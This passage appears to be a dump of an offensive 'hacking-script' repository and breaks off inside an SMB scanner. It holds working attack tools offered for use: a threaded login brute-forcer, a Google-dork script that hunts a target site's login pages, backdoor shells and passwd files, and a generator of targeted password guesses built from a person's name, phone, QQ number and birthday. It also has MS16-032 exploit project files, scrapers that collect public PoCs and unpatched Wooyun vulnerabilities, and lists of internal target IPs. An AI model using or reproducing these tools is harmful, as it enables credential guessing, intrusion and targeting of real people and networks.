| print '\n[+] 暴力破解测试中……\n' 66 | thrdlist = [] 67 | for user in userlist: 68 | for pwd in passlist: 69 | t = Thread(target=brute_users, args=(user, pwd)) 70 | t.start() 71 | thrdlist.append(t) 72 | time.sleep(0.009) 73 | for x in thrdlist: 74 | x.join() 75 | print '[+] 破解完成,用时: %d 秒' % (time.time() - start_time) 76 | -------------------------------------------------------------------------------- /Goohak/README.md: -------------------------------------------------------------------------------- 1 | # GooHak v1.3 by 1N3@CrowdShield 2 | http://crowdshield.com 3 | 4 | ## ABOUT: 5 | GooHak is a shell script to automatically launch google hacking queries against a target domain to find vulnerabilities and enumerate a target. 6 | 7 | ## DEPENDENCIES: 8 | * iceweasel 9 | * Linux 10 | 11 | ## USAGE: 12 | ``` 13 | ./goohak domain.com 14 | ``` 15 | -------------------------------------------------------------------------------- /Goohak/goohak: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # + -- --=[GooHak v1.5 by 1N3 3 | # + -- --=[http://crowdshield.com 4 | # 5 | # ABOUT: 6 | # GooHak is a shell script to automatically launch google hacking queries against a target domain to find vulnerabilities and enumerate a target. 7 | # 8 | # DEPENDENCIES: 9 | # iceweasel 10 | # Linux 11 | 12 | TARGET="$1" 13 | OKBLUE='\033[94m' 14 | OKRED='\033[91m' 15 | OKGREEN='\033[92m' 16 | OKORANGE='\033[93m' 17 | RESET='\e[0m' 18 | 19 | if [ -z $TARGET ]; then 20 | echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET" 21 | echo -e "$OKORANGE + -- --=[GooHak v1.5 by 1N3$RESET" 22 | echo -e "$OKORANGE + -- --=[Usage: goohak $RESET" 23 | exit 24 | fi 25 | 26 | iceweasel 2> /dev/null & 27 | sleep 5 28 | 29 | # LOAD WEBSITE IN A WEB BROSER 30 | iceweasel http://$TARGET 2> /dev/null 31 | iceweasel https://$TARGET 2> /dev/null 32 | # TCPUTILS 33 | iceweasel http://www.tcpiputils.com/browse/domain/$TARGET 2> /dev/null 34 | # NETCRAFT 35 | iceweasel http://toolbar.netcraft.com/site_report?url=$TARGET 2> /dev/null 36 | # SHOWDAN 37 | iceweasel https://www.shodan.io/search?query=$TARGET 2> /dev/null 38 | # CENSYS 39 | iceweasel https://www.censys.io/ipv4?q=$TARGET 2> /dev/null 40 | # CRT.SH 41 | iceweasel https://crt.sh/?q=%25.$TARGET 2> /dev/null 42 | # ZONE-H 43 | iceweasel "https://www.google.ca/search?q=site:zone-h.org+$TARGET" 2> /dev/null 44 | # XSSPOSED 45 | iceweasel "https://www.xssposed.org/search/?search=$TARGET&type=host" 2> /dev/null 46 | # PUNKSPIDER 47 | iceweasel "https://securityheaders.io/?q=$TARGET" 2> /dev/null 48 | # SSLLABS 49 | iceweasel https://www.ssllabs.com/ssltest/analyze.html?d=$TARGET 2> /dev/null 50 | # HEADER CHECK 51 | iceweasel https://securityheaders.io/?q=$TARGET 2> /dev/null 52 | 53 | sleep 30 54 | 55 | # FIND LOGIN PAGES: 56 | iceweasel "https://www.google.ca/search?q=site:$TARGET+username+OR+password+OR+login+OR+root+OR+admin" 2> /dev/null 57 | # SEARCH FOR BACKDOORS: 58 | iceweasel "https://www.google.ca/search?q=site:$TARGET+inurl:shell+OR+inurl:backdoor+OR+inurl:wso+OR+inurl:cmd+OR+shadow+OR+passwd+OR+boot.ini+OR+inurl:backdoor" 2> /dev/null 59 | # FIND SETUP OR INSTALL FILES: 60 | iceweasel "https://www.google.ca/search?q=site:$TARGET+inurl:readme+OR+inurl:license+OR+inurl:install+OR+inurl:setup+OR+inurl:config" 2> /dev/null 61 | # FIND WORDPRESS PLUGINS/UPLOADS/DOWNLOADS: 62 | iceweasel "https://www.google.ca/search?q=site:$TARGET+inurl:wp-+OR+inurl:plugin+OR+inurl:upload+OR+inurl:download" 2> /dev/null 63 | # FIND OPEN REDIRECTS: 64 | iceweasel "https://www.google.ca/search?q=site:$TARGET+inurl:redir+OR+inurl:url+OR+inurl:redirect+OR+inurl:return+OR+inurl:src=http+OR+inurl:r=http" 2> /dev/null 65 | # FIND FILES BY EXTENSION: 66 | iceweasel "https://www.google.ca/search?q=site:$TARGET+ext:cgi+OR+ext:php+OR+ext:asp+OR+ext:aspx+OR+ext:jsp+OR+ext:jspx+OR+ext:swf+OR+ext:fla+OR+ext:xml" 2> /dev/null 67 | # FIND DOCUMENTS BY EXTENSION: 68 | iceweasel "https://www.google.ca/search?q=site:$TARGET+ext:doc+OR+ext:docx+OR+ext:csv+OR+ext:pdf+OR+ext:txt+OR+ext:log+OR+ext:bak" 2> /dev/null 69 | # FIND APACHE STRUTS RCE's: 70 | iceweasel "https://www.google.ca/search?q=site:$TARGET+ext:action+OR+struts" 2> /dev/null 71 | # FIND PASTEBIN POSTS FOR DOMAIN: 72 | iceweasel "https://www.google.ca/search?q=site:pastebin.com+$TARGET" 2> /dev/null 73 | # FIND EMPLOYEES ON LINKEDIN: 74 | iceweasel "https://www.google.ca/search?q=site:linkedin.com+employees+$TARGET" 2> /dev/null 75 | 76 | -------------------------------------------------------------------------------- /IISRCE-CVE-2017-7269 检测工具/IISRCE-CVE-2017-7269.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/IISRCE-CVE-2017-7269 检测工具/IISRCE-CVE-2017-7269.exe -------------------------------------------------------------------------------- /MS16-032-master/README.md: -------------------------------------------------------------------------------- 1 | # MS16-032(CVE-2016-0099) for SERVICE ONLY 2 | 3 | **this exploit can only use on SERVICE** 4 | 5 | do logical exploit,on logical exploits. 6 | 7 | -------------------------------------------------------------------------------- /MS16-032-master/ms16-032.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/MS16-032-master/ms16-032.png -------------------------------------------------------------------------------- /MS16-032-master/ms16-032.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2013 4 | VisualStudioVersion = 12.0.21005.1 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ms16-032", "ms16-032\ms16-032.vcxproj", "{90842927-6D62-4465-93A3-37FC28C12018}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Release|Win32 = Release|Win32 11 | Release|x64 = Release|x64 12 | Release64|Win32 = Release64|Win32 13 | Release64|x64 = Release64|x64 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {90842927-6D62-4465-93A3-37FC28C12018}.Release|Win32.ActiveCfg = Release|Win32 17 | {90842927-6D62-4465-93A3-37FC28C12018}.Release|Win32.Build.0 = Release|Win32 18 | {90842927-6D62-4465-93A3-37FC28C12018}.Release|x64.ActiveCfg = Release|Win32 19 | {90842927-6D62-4465-93A3-37FC28C12018}.Release|x64.Build.0 = Release|Win32 20 | {90842927-6D62-4465-93A3-37FC28C12018}.Release64|Win32.ActiveCfg = Release64|Win32 21 | {90842927-6D62-4465-93A3-37FC28C12018}.Release64|Win32.Build.0 = Release64|Win32 22 | {90842927-6D62-4465-93A3-37FC28C12018}.Release64|x64.ActiveCfg = Release64|x64 23 | {90842927-6D62-4465-93A3-37FC28C12018}.Release64|x64.Build.0 = Release64|x64 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | EndGlobal 29 | -------------------------------------------------------------------------------- /MS16-032-master/ms16-032/ms16-032.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/MS16-032-master/ms16-032/ms16-032.cpp -------------------------------------------------------------------------------- /MS16-032-master/ms16-032/ms16-032.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 源文件 23 | 24 | 25 | -------------------------------------------------------------------------------- /MS16-032-master/ms16-032/ms16-032.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /Mdic.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | print '姓名是三字或更多,请在名后面加-,在-后面添加名的首字母,比如姓名:wangbadan:' 3 | print '姓:wang' 4 | print '名:badan-bd' 5 | print '2字正常输入就可以了' 6 | 7 | #信息设置区 8 | 9 | str1 = raw_input('姓:') 10 | str2 = raw_input('名:') 11 | str3 = raw_input('手机:') 12 | str4 = raw_input('QQ:') 13 | str5 = str(raw_input('年月日(19890507):')) 14 | str6 = raw_input('域名(www.baidu.com):') 15 | str7 = ('123','123456','000','666','888','8888','888888','123..','!@#','~!@','~!@#','issb','likemakelove','iloveyou','loveyou','admin','system','gl','guanli','manager')#可自行添加 16 | arr1 = {1:'!',2:'@',3:'#',4:'$',5:'%',6:'^',7:'&',8:'*',9:'(',0:')'} 17 | dic = [] 18 | tdic = [] 19 | ttdic = [] 20 | tttdic = [] 21 | 22 | #信息加工区 23 | 24 | if str1!="": 25 | str1_a=str1[:1] #截取姓首字母 26 | else: 27 | print("必须输入姓") 28 | if str2!="": 29 | if str2.find('-')>0: 30 | str2_a=str2[str2.find('-')+1:] 31 | str2=str2[:str2.find('-')] 32 | else: 33 | str2_a=str2[:1] #截取名首字母 34 | if str3!="": 35 | str3_a=str3[-8:] #截取后8位 36 | str3_b=str3[-6:] #截取后6位 37 | str3_c=str3[:6] #截取前6位 38 | else: 39 | print("必须输入手机或座机") 40 | if str5!="": 41 | str5_a=str5[:4] #截取前4为,年 42 | str5_b=str5[4:8] #截取5-8位,月日 43 | for i in str5_a: 44 | tdic.append(arr1[int(i)]) #年对应符号,eg:1986==!(*^ 45 | tt=',' 46 | str5_a1=tt.join(tdic) 47 | for i in str5_b: 48 | ttdic.append(arr1[int(i)]) #月日对应符号 49 | tt=',' 50 | str5_b1=tt.join(ttdic) 51 | for i in str5_b.strip('0'): 52 | tttdic.append(arr1[int(i)]) #没有0的月日对应符号 53 | tt=',' 54 | str5_b2=tt.join(tttdic) 55 | if str6!="": 56 | t1=str6.strip('http://').split('.') #去除[http://]并已点分割域名 57 | if t1[0]=='www': 58 | str6_a='' #如果二级域名是www清除 59 | str6_b=t1[1] #截取主域名字符 60 | str6_c=t1[2] #截取域名后缀 61 | else: 62 | str6_a=t1[0] #截取二级域名 63 | str6_b=t1[1] #截取主域名字符 64 | str6_c=t1[2] #截取域名后缀 65 | 66 | #手写规则区 67 | 68 | dic.append(str1+str3) #姓加手机 69 | dic.append(str1+str3_a) #姓名加手机后8位 70 | dic.append(str1+str3_b) #姓名加手机后6为 71 | dic.append(str1+str3_c) #姓名加手机前6位 72 | dic.append(str1+str4) #姓加QQ 73 | dic.append(str1+str5) #姓加生日 74 | dic.append(str1+str5[2:]) #姓名加生日不要前2位 75 | dic.append(str1+str5_a+str5_b.replace('0','')) #姓加生日,日月没0 76 | dic.append(str1+str5_a) #姓名加年 77 | dic.append(str1+str5_b) #姓加月日 78 | dic.append(str1+str5_b.replace('0','')) #姓加日月没0 79 | # 80 | dic.append(str1+str2) #姓名 81 | dic.append(str1+str2+str3) #姓名加手机 82 | dic.append(str1+str2+str3_a) #姓名加手机后8位 83 | dic.append(str1+str2+str3_b) #姓名加手机后6为 84 | dic.append(str1+str2+str3_c) #姓名加手机前6位 85 | dic.append(str1+str2+str4) #姓名加QQ 86 | dic.append(str1+str2+str5) #姓名加生日 87 | dic.append(str1+str2+str5[2:]) #姓名加生日不要前2位 88 | dic.append(str1+str2+str5_a) #姓名加年 89 | dic.append(str1+str2+str5_b) #姓名加月日 90 | dic.append(str1+str2+str5_b.replace('0','')) #姓名加月日没有0 91 | dic.append(str1+str2+str5_a1) #姓名加年对应符号 92 | dic.append(str1+str2+str5_b1) #姓名加日月对应符号 93 | dic.append(str1+str2+str5_b2) #姓名加日月对应符号没有0 94 | dic.append(str1+str2+str6_a) #姓名加二级域名 95 | dic.append(str1+str2+str6_b) #姓名加主域名字符 96 | # 97 | dic.append(str1_a+str2_a+str3) #姓名首字母加手机 98 | dic.append(str1_a+str2_a+str3_a) #姓名首字母加手机后8位 99 | dic.append(str1_a+str2_a+str3_b) #姓名加字母手机后6为 100 | dic.append(str1_a+str2_a+str3_c) #姓名加字母手机前6位 101 | dic.append(str1_a+str2_a+str4) #姓名首字母加QQ 102 | dic.append(str1_a+str2_a+str5) #姓名首字母加生日 103 | dic.append(str1_a+str2_a+str5[2:]) #姓名首字母加生日不要前2位 104 | dic.append(str1_a+str2_a+str5_a) #姓名首字母加年 105 | dic.append(str1_a+str2_a+str5_b) #姓名首字母加月日 106 | dic.append(str1_a+str2_a+str5_b.replace('0',''))#姓名首字母加月日没有0 107 | dic.append(str1_a+str2_a+str5_a1) #姓名首字母加年对应符号 108 | dic.append(str1_a+str2_a+str5_b1) #姓名首字母加日月对应符号 109 | dic.append(str1_a+str2_a+str5_b2) #姓名首字母加日月对应符号没有0 110 | dic.append(str1_a+str2_a+str6_a) #姓名首字母加二级域名 111 | dic.append(str1_a+str2_a+str6_b) #姓名首字母加主域名字符 112 | dic.append(str1_a+str2_a+str6_a+str6_b+str6_c) #姓名首字母加域名不要点 113 | dic.append(str1_a+str2_a+str6_a+'.'+str6_b+'.'+str6_c) #姓名首字母加域名带点 114 | for hz in str7: 115 | dic.append(str1_a+str2_a+hz) 116 | dic.append(str1+str2+hz) 117 | dic.append(str6_b+hz) 118 | print '***************************Mdic start*******************************' 119 | for i in dic: 120 | print i 121 | 122 | 123 | 124 | 125 | -------------------------------------------------------------------------------- /NTFS交换数据流检测工具.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/NTFS交换数据流检测工具.rar -------------------------------------------------------------------------------- /PythonSpider-BeeBeeto/BeeBeetoSpider.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding=utf-8 3 | 4 | """ 5 | Function: Spider for BeeBeeto 6 | Author: PyxYuYu 7 | """ 8 | 9 | import urllib2 10 | from bs4 import BeautifulSoup 11 | import re 12 | import os 13 | import sys 14 | import argparse 15 | 16 | # 保存POC到txt文件 17 | def Poc_Save(save_path, save_name, poc): 18 | # 创建保存路径 19 | if not os.path.exists(save_path): 20 | os.makedirs(save_path) 21 | path = save_path + '/' + save_name 22 | with open(path, 'a+') as f: 23 | f.write(poc) 24 | f.write('\n') 25 | 26 | # 获取URL源码 27 | def Url_Soup(url): 28 | # 网站禁止爬虫,需要伪装浏览器 29 | user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0' 30 | request = urllib2.Request(url) 31 | request.add_header('User-Agent', user_agent) 32 | response = urllib2.urlopen(request) 33 | soup = BeautifulSoup(response.read(), 'html.parser') 34 | return soup 35 | 36 | # 获取POC数据 37 | def Poc_Get(): 38 | 39 | global poc_list 40 | global sign 41 | x = 1 42 | url_base = 'http://www.beebeeto.com/pdb/public/?page=' 43 | url_first = url_base + str(x) 44 | poc_path = './BeeBeeto' 45 | full_poc = Url_Soup(url_first).find_all(href=re.compile(r'poc')) 46 | for each_public in full_poc: 47 | poc_list.append(each_public.string) 48 | print each_public.string + ' is done.' 49 | url_vul = url_index + each_public.attrs['href'] 50 | poc_detail = Url_Soup(url_vul).find_all('pre') 51 | for each_detail in poc_detail: 52 | poc_name = each_public.string.replace('/', '') + '.txt' 53 | Poc_Save(poc_path, poc_name, each_detail.string.encode('utf-8')) 54 | print 'This page is done.The next page is starting.' 55 | x = 2 56 | url = url_base + str(x) 57 | while x <= 100: 58 | if (sign!=0): 59 | Poc_Get1(url) 60 | x = x + 1 61 | url = url_base + str(x) 62 | else: 63 | break 64 | 65 | def Poc_Get1(url): 66 | 67 | global poc_list 68 | global sign 69 | poc_path = './BeeBeeto' 70 | full_poc = Url_Soup(url).find_all(href=re.compile(r'poc')) 71 | for each_public in full_poc: 72 | if each_public.string in poc_list: 73 | print "It's over." 74 | sign = 0 75 | return 0 76 | else: 77 | poc_list.append(each_public.string) 78 | print each_public.string + ' is done.' 79 | url_vul = url_index + each_public.attrs['href'] 80 | poc_detail = Url_Soup(url_vul).find_all('pre') 81 | for each_detail in poc_detail: 82 | # 针对文件名中不能出现的几个符号正则替换成空 83 | a = re.compile('[/\?\\<>:\*]') 84 | poc_name = a.sub('', each_public.string) + '.txt' 85 | Poc_Save(poc_path, poc_name, each_detail.string.encode('utf-8')) 86 | print 'This page is done.The next page is starting.' 87 | 88 | 89 | if __name__ == '__main__': 90 | sign = 1 91 | poc_list = [] 92 | print '----start----' 93 | url_index = 'http://www.beebeeto.com' 94 | Poc_Get() 95 | print '----end------' 96 | 97 | -------------------------------------------------------------------------------- /PythonSpider-BeeBeeto/README.MD: -------------------------------------------------------------------------------- 1 | * 爬虫目标:BeeBeeto 网站 2 | * 爬虫目的:下载POC,并保存 3 | * 爬虫思路: 4 | * 先爬取公开POC页面,然后爬取每个POC具体内容 5 | * 应该采用多线程机制 6 | * 应该加入命令行参数 7 | 8 |
9 | ---- 10 | * 今日BeeBeeto自动跳转Seebug,所以这个爬虫就结束了 11 | * 已经实现: 12 | * 多线程,简单命令行参数 13 | 14 |
15 | ---- 16 | 2016年3月9日 21:57:29 17 | -------------------------------------------------------------------------------- /PythonSpider-Wooyun/IVSpider-Wooyun/IVSpider.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding=utf-8 3 | 4 | """ 5 | Function: Ingored Vulnerabilities Spider for Wooyun 6 | Author: PyxYuYu 7 | Time: 2016年3月11日 23:05:44 8 | """ 9 | 10 | import urllib2 11 | from bs4 import BeautifulSoup 12 | import re 13 | import time 14 | from cmdline import parse_args 15 | 16 | 17 | # 返回soup,获取url源码 18 | def url_res(url): 19 | user_agent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0" 20 | req = urllib2.Request(url) 21 | req.add_header("User-Agent", user_agent) 22 | res = urllib2.urlopen(req).read() 23 | return res 24 | 25 | 26 | # 分析源码,正则或者BeautifulSoup模块 27 | def get_url(page): 28 | 29 | vul_public = "http://wooyun.org/bugs/new_public/page/" + str(page) 30 | # 测试用 31 | # print url_soup(vul_public).find_all('a') 32 | # 方法一:先找这个tag,找到后在找href,然后匹配 33 | # for each in BeautifulSoup(url_res(vul_public),'html.parser', from_encoding='UTF-8').find_all('a'): 34 | # # print each['href'] 35 | # # 判断一下是什么类型 unicode 36 | # # print type(each['href']) 37 | # # /bugs/wooyun-2016-0176846 正则匹配 38 | # # 会有2个网址匹配出来,带个#就只能匹配出一个了 39 | # url_re = re.compile(r'/bugs/.*\d{6}#') 40 | # # 返回的是一个列表,没匹配到返回空列表 41 | # each_url = url_re.findall(each['href']) 42 | # if each_url != []: 43 | # # 每个列表只有一个元素 44 | # # vul_list.append(each_url[0]) 45 | # print each_url[0] 46 | # # 寻找忽略漏洞 47 | # if get_vul(each_url[0]) > 0: 48 | # vul_detail(each_url[0]) 49 | # else: 50 | # print "Didn't find." 51 | # else: 52 | # pass 53 | # 方法二:更加简单,直接匹配了找 54 | for each in BeautifulSoup(url_res(vul_public), 'html.parser', from_encoding='UTF-8').find_all(href=re.compile( 55 | r'/bugs/.*\d{6}'), title=None): 56 | # print each.string 57 | # 厂商忽略的漏洞 58 | if get_vul(each['href']) > 0: 59 | print each.string 60 | # vul_detail(each['href']) 61 | print "http://www.wooyun.org/" + each['href'] 62 | print "The vulnerability is ignored." 63 | else: 64 | # print "The vulnerability is fixed." 65 | pass 66 | 67 | 68 | def get_vul(url): 69 | 70 | url_ignored = "http://www.wooyun.org/" + url 71 | return url_res(url_ignored).find("忽略") 72 | 73 | 74 | def vul_detail(url): 75 | 76 | url_vul = "http://www.wooyun.org/" + url 77 | soup = BeautifulSoup(url_res(url_vul), 'html.parser', from_encoding='UTF-8') 78 | # print soup.find_all('title')[0].string 79 | for each in soup.find_all('code'): 80 | # 因为each.string 无法获取其内包含多个子节点的内容,返回None 81 | # 所以用 get_text() 82 | print each.get_text() 83 | 84 | 85 | def main(s_num, e_num): 86 | 87 | for i in range(s_num, e_num): 88 | get_url(i) 89 | 90 | print "-------------------It's done.--------------------" 91 | 92 | 93 | if __name__ == "__main__": 94 | start_time = time.time() 95 | # 创建命令行参数 Namespace对象 96 | args = parse_args() 97 | main(args.s, args.e) 98 | cost_time = time.time() - start_time 99 | print "Current spider is finished in " + str(int(cost_time / 60)) + " mins %.2f seconds." % (cost_time % 60) 100 | -------------------------------------------------------------------------------- /PythonSpider-Wooyun/IVSpider-Wooyun/README.md: -------------------------------------------------------------------------------- 1 | #IVSpider 2 | **I**gnored **V**ulnerabilities **S**pider for Wooyun 3 | ##Version 4 | ``` 5 | IVSpider.py ------- 单线程版本,舍弃 6 | IVSpider02.py ----- 多线程版本,下载本地后重命名为IVSpider.py即可 7 | ``` 8 | ##Usage 9 | ``` 10 | usage: IVSpider.py [options] 11 | 12 | *Ingored Vulnerabilities Spider for Wooyun.* 13 | 14 | optional arguments: 15 | -h, --help show this help message and exit 16 | -s StartPage The start page of Wooyun (default: 1) 17 | -e EndPage The end page of Wooyun, Not including (default: 2) 18 | -t Threads Num of threads for spider, 10 for default (default: 10) 19 | 20 | ``` 21 | ##Instruction 22 | ``` 23 | 1. Python 2.7.x && BeautifulSoup4==4.3.2 24 | 2. 自定义搜索起始页和终止页 25 | 3. 自定义线程数量 26 | ``` 27 | ##Example 28 | ``` 29 | python IVSpider.py -s 10 -e 30 -t 20 30 | ``` 31 | ##Bug 32 | ``` 33 | 1. 可能会被评论区的忽略给误导了 34 | 2. 当数量大时,子线程可能会有几天不能正常关闭(原因未知,可能是Queue队列的Bug) 35 | ``` 36 | -------------------------------------------------------------------------------- /PythonSpider-Wooyun/IVSpider-Wooyun/cmdline.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding=utf-8 3 | 4 | import argparse 5 | import sys 6 | 7 | 8 | # 设置命令行参数 9 | def parse_args(): 10 | # argparse.ArgumentDefaultsHelpFormatter 最常用的输出格式 11 | parser = argparse.ArgumentParser(prog='IVSpider', formatter_class=argparse.ArgumentDefaultsHelpFormatter, 12 | description="*Ingored Vulnerabilities Spider for Wooyun.*", 13 | usage="IVSpider.py [options]") 14 | # metavar 参数在帮助信息的名字 15 | parser.add_argument('-s', metavar='StartPage', type=int, default=1, help="The start page of Wooyun") 16 | parser.add_argument('-e', metavar='EndPage', type=int, default=2, help="The end page of Wooyun, Not including") 17 | parser.add_argument('-t', metavar='Threads', type=int, default=10, help="Num of threads for spider, 10 for default") 18 | 19 | # 如果cmd接受到的参数只有1,也就是只有一个脚本名,那么就添加一个 -h/-help 的命令 20 | if len(sys.argv) == 1: 21 | sys.argv.append('-h') 22 | args = parser.parse_args() 23 | return args 24 | -------------------------------------------------------------------------------- /PythonSpider-Wooyun/README.md: -------------------------------------------------------------------------------- 1 | ##Progect 2 | ``` 3 | 1. IVSpider 乌云忽略漏洞查询 4 | 5 | 2. WVSearch 乌云漏洞查询 6 | ``` 7 | ---- 8 | 2016年3月14日 21:47:58 9 | -------------------------------------------------------------------------------- /PythonSpider-Wooyun/WVSearch/README.md: -------------------------------------------------------------------------------- 1 | # WVSearch 2 | **W**ooyun **V**ulnerabilites **Search** 3 | ## Usage 4 | ``` 5 | usage: WVSearch.py [options] 6 | 7 | * Wooyun Vulnerabilities Search * 8 | 9 | optional arguments: 10 | -h, --help show this help message and exit 11 | -s StartPage Start page for searching (default: 1) 12 | -e EndPage End page for searching (default: 10) 13 | -t ThreadNum Num of threads (default: 10) 14 | -k KeyWord Keywords for searching (default: SQL|XSS|CSRF) 15 | --browser Open web browser to view report after after search was 16 | finished. (default: False) 17 | ``` 18 | ## Instruction 19 | ``` 20 | 1. Python 2.7.x && BeautifulSoup4==4.3.2 21 | 2. 自定义搜索的起始页和终止页 22 | 3. 自定义线程数,默认10 23 | 4. 自定义搜索关键词,用 '|' 分隔,关键词用双引号包裹 24 | 5. 结果保存为html文件,可以在搜索结束自动打开 25 | ``` 26 | ## Example 27 | ``` 28 | python WVSearch.py -s 10 -e 100 -t 20 -k "中国|SQL|XSS|xss" --browser 29 | ``` 30 | -------------------------------------------------------------------------------- /PythonSpider-Wooyun/WVSearch/cmdline.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding=utf-8 3 | 4 | 5 | import argparse 6 | import sys 7 | 8 | def parse_args(): 9 | 10 | # 创建一个命令行参数对象 11 | parser = argparse.ArgumentParser(prog='WVSearch', usage="WVSearch.py [options]", 12 | description="* Wooyun Vulnerabilities Search *", 13 | formatter_class=argparse.ArgumentDefaultsHelpFormatter) 14 | 15 | parser.add_argument('-s', metavar='StartPage', type=int, default=1, help='Start page for searching') 16 | parser.add_argument('-e', metavar='EndPage', type=int, default=10, help='End page for searching') 17 | parser.add_argument('-t', metavar='ThreadNum', type=int, default=10, help='Num of threads') 18 | parser.add_argument('-k', metavar='KeyWord', type=str, default='SQL|XSS|CSRF', help='Keywords for searching') 19 | parser.add_argument('--browser', default=False, action='store_true', 20 | help="Open web browser to view report after after search was finished.") 21 | 22 | # 如果什么都没输入,就输入了一个脚本名,那么就是sys.argv只有一个参数 23 | if len(sys.argv) == 1: 24 | sys.argv.append('-h') 25 | 26 | # 返回一个保存命令行参数的命名空间 27 | args = parser.parse_args() 28 | return args 29 | -------------------------------------------------------------------------------- /PythonSpider-Wooyun/WVSearch/report.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | 3 | TEMPLATE_html = """ 4 | 5 | 6 | WVSearch Report 7 | 12 | 13 | 14 |

Welcome to use the Wooyun Vulnerabilities Search. * WVSearch *

15 |

Current Search was finished in ${cost_min} min ${cost_seconds} seconds.

16 |

${total_name} vulnerabilities match the requirements of searching in total.

17 | ${content} 18 | 19 | 20 | """ 21 | 22 | TEMPLATE_result = """ 23 |
  • ${name}
    • 24 | """ 25 | -------------------------------------------------------------------------------- /PythonSpider-Wooyun/WVSearch/report/.gitigonre: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/PythonSpider-Wooyun/WVSearch/report/.gitigonre -------------------------------------------------------------------------------- /QQDataSearcher.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/QQDataSearcher.rar -------------------------------------------------------------------------------- /Smbscan/Smbtouch-1.1.1.fb: -------------------------------------------------------------------------------- 1 | 2 | 7 | 8 | -------------------------------------------------------------------------------- /Smbscan/cmd.cmd: -------------------------------------------------------------------------------- 1 | cmd.exe -------------------------------------------------------------------------------- /Smbscan/ip.txt: -------------------------------------------------------------------------------- 1 | 10.100.2.2 2 | 10.100.2.1 3 | 10.100.2.6 4 | 10.100.2.9 5 | 10.100.2.12 6 | 10.100.228.152 7 | 10.100.246.163 8 | 10.100.251.249 9 | 10.200.13.231 10 | 10.200.80.19 11 | 10.200.87.172 12 | 10.200.100.147 13 | 10.200.101.49 14 | 10.201.161.37 -------------------------------------------------------------------------------- /Smbscan/ips.txt: -------------------------------------------------------------------------------- 1 | 10.40.0.201 2 | 10.40.4.102 3 | 10.40.6.6 4 | 10.40.6.102 5 | 10.40.6.105 6 | 10.40.6.113 7 | 10.40.6.109 8 | 10.40.6.116 9 | 10.40.6.115 10 | 10.40.6.126 11 | 10.40.7.102 12 | 10.40.7.104 13 | 10.40.7.107 14 | 10.40.7.114 15 | 10.40.7.115 16 | 10.40.7.117 17 | 10.40.7.116 18 | 10.40.7.171 19 | 10.40.7.206 20 | 10.40.7.250 -------------------------------------------------------------------------------- /Smbscan/pytrch.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/Smbscan/pytrch.pyc -------------------------------------------------------------------------------- /Smbscan/smbscan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import binascii 4 | import socket 5 | import struct 6 | import threading 7 | import subprocess 8 | import tempfile 9 | import re 10 | import Queue 11 | import sys 12 | 13 | def MyThread(urllist): 14 | threads = [] 15 | queue = Queue.Queue() 16 | for i in range(len(urllist)): 17 | queue.put((i+1,urllist[i].strip())) 18 | for x in xrange(0, int(sys.argv[2])): 19 | threads.append(tThread(queue)) 20 | 21 | for t in threads: 22 | t.start() 23 | for t in threads: 24 | t.join() 25 | 26 | 27 | class tThread(threading.Thread): 28 | def __init__(self, queue): 29 | threading.Thread.__init__(self) 30 | self.queue = queue 31 | 32 | def run(self): 33 | 34 | while not self.queue.empty(): 35 | num,host = self.queue.get() 36 | try: 37 | send2(host) 38 | except Exception,e: 39 | print '[%s/%s],%s,%s' %(num,nums,host,e) 40 | pass 41 | 42 | def logout(msg): 43 | with open('smbresult.txt','a') as f: 44 | print >>f,msg 45 | 46 | def send2(targetip): 47 | templist=[] 48 | templist.append(targetip) 49 | out_temp = tempfile.SpooledTemporaryFile(bufsize=10 * 1000) 50 | fileno = 